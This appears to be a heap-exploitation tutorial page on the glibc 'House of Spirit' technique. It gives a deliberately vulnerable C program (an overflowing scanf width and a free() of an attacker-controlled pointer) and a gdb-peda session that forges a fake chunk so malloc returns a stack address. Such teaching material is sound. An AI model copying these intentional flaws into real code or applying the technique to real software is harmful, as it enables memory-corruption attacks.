
        

List

The House of Spirit

Conditions

Exploit plan

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * House of Spirit demonstration program (deliberately vulnerable; see the
 * "Exploit plan" section above). Both defects below are intentional and are
 * exactly what the GDB walkthrough that follows relies on, so the code is
 * left byte-for-byte as written; do not reuse it outside this exercise.
 *
 * Note: `void main()` is non-standard C for a hosted program, which should
 * declare `int main(void)`. Kept as-is so the addresses in the GDB session
 * still line up with this listing.
 */
void main(){
	/* Never assigned by the program; its value comes only from the
	 * out-of-bounds write in scanf() below. */
	unsigned long *ptr;
	/* 160-byte buffer that the input is written into; in the session it
	 * holds the fake chunk (the size field is placed at fakeChunk+8). */
	char fakeChunk[160];

	/* Prints both stack addresses. In the session fakeChunk is
	 * 0x7fffffffe1c0 and ptr is 0x7fffffffe260, i.e. 0xa0 = 160 bytes apart,
	 * so ptr sits immediately after the array. */
	printf("fakeChunk : %p\n",fakeChunk);
	printf("ptr : %p\n",&ptr);

	/* Defect 1 (intentional): the width 176 exceeds sizeof(fakeChunk) == 160,
	 * so up to 16 bytes plus the terminating NUL run past the array and land
	 * on ptr (the "BBBBBBBB" input shows up at 0x7fffffffe260 in the dump).
	 * A correct program bounds the width to the buffer, e.g. "%159s". */
	scanf("%176s",fakeChunk);

	/* Return value discarded; presumably only here so the allocator
	 * (main_arena) is initialised before the free() below — TODO confirm. */
	malloc(1000);

	/* Defect 2 (intentional): ptr was never obtained from malloc(), so free()
	 * receives the attacker-controlled value written by the overflow. With a
	 * plausible size field in fakeChunk the stack address is accepted and
	 * placed in a fastbin (main_arena.fastbinsY shows 0x7fffffffe1c0 in the
	 * session). Initialising ptr to NULL and freeing only pointers returned
	 * by malloc() would remove this condition. */
	free(ptr);

	/* In the session the fake chunk's size field is set to 0x80 and this
	 * request is served from that fastbin: malloc() returns 0x7fffffffe1d0,
	 * a stack address, rather than a heap address. */
	char *stack = malloc(0x70);
	/* test1 and test2 are otherwise unused; they show where later
	 * allocations are served from (the final rax value 0x602400 in the
	 * session appears to be one of them — inferred, not shown directly). */
	char *test1 = malloc(0x70);
	char *test2 = malloc(0x500);

	/* Prints the stack address handed back by malloc(0x70). */
	printf("Stack : %p\n",stack);
}

Exploit flow

Debugging

gdb-peda$ b *0x000000000040067b
Breakpoint 1 at 0x40067b
gdb-peda$ b *0x0000000000400691
Breakpoint 2 at 0x400691
gdb-peda$ b *0x000000000040069b
Breakpoint 3 at 0x40069b
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/heap/spirit 
fakeChunk : 0x7fffffffe1c0
ptr : 0x7fffffffe260
Breakpoint 1, 0x000000000040067b in main ()
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x0000000000000000	0x0000000000000000
0x7fffffffe1d0:	0x0000000000000000	0x0000000000000000
0x7fffffffe1e0:	0x0000000000000000	0x00007ffff7ffe520
0x7fffffffe1f0:	0x00007fffffffe220	0x00007fffffffe210
0x7fffffffe200:	0x00000000f63d4e2e	0x0000000000400388
0x7fffffffe210:	0x00000000ffffffff	0x00007fffffffe378
0x7fffffffe220:	0x00007ffff7a211f8	0x00007ffff7ff74c0
0x7fffffffe230:	0x00007ffff7ffe1c8	0x0000000000000000
0x7fffffffe240:	0x0000000000000001	0x000000000040071d
0x7fffffffe250:	0x00007fffffffe280	0x0000000000000000
0x7fffffffe260:	0x00000000004006d0	0x0000000000400540
gdb-peda$ ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB
0x0000000000400680 in main ()
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1d0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x4141414141414141
0x7fffffffe250:	0x4141414141414141	0x4141414141414141
0x7fffffffe260:	0x4242424242424242	0x0000000000400500
gdb-peda$ set *0x7fffffffe1c8 = 0x80
gdb-peda$ set *0x7fffffffe1cc = 0x0
gdb-peda$ set *0x7fffffffe248 = 0x10000
gdb-peda$ set *0x7fffffffe24c = 0x0
gdb-peda$ set *0x7fffffffe260 = 0x7fffffffe1d0
gdb-peda$ set *0x7fffffffe264 = 0x7fff
gdb-peda$ x/22gx 0x7fffffffe1c0
0x7fffffffe1c0:	0x4141414141414141	0x0000000000000080
0x7fffffffe1d0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x0000000000010000
0x7fffffffe250:	0x4141414141414141	0x4141414141414141
0x7fffffffe260:	0x00007fffffffe1d0	0x0000000000400500
gdb-peda$
Breakpoint 2, 0x0000000000400691 in main ()
gdb-peda$ i r rdi
rdi            0x7fffffffe1d0	0x7fffffffe1d0
gdb-peda$ p main_arena.fastbinsY 
$3 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}
gdb-peda$ ni


0x0000000000400696 in main ()
gdb-peda$ p main_arena.fastbinsY 
$4 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7fffffffe1c0, 0x0, 0x0, 0x0} 
gdb-peda$ c
Breakpoint 3, 0x000000000040069b in main ()
gdb-peda$ ni
0x00000000004006a0 in main ()
gdb-peda$ i r rax
rax            0x7fffffffe1d0	0x7fffffffe1d0
gdb-peda$ x/16gx 0x7fffffffe1d0
0x7fffffffe1d0:	0x0000000000000000	0x4141414141414141
0x7fffffffe1e0:	0x4141414141414141	0x4141414141414141
0x7fffffffe1f0:	0x4141414141414141	0x4141414141414141
0x7fffffffe200:	0x4141414141414141	0x4141414141414141
0x7fffffffe210:	0x4141414141414141	0x4141414141414141
0x7fffffffe220:	0x4141414141414141	0x4141414141414141
0x7fffffffe230:	0x4141414141414141	0x4141414141414141
0x7fffffffe240:	0x4141414141414141	0x0000000000010000
gdb-peda$ p main_arena.fastbinsY 
$2 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}
gdb-peda$ ni
...
gdb-peda$ i r rax
rax            0x602400	0x602400
gdb-peda$ 

Related information
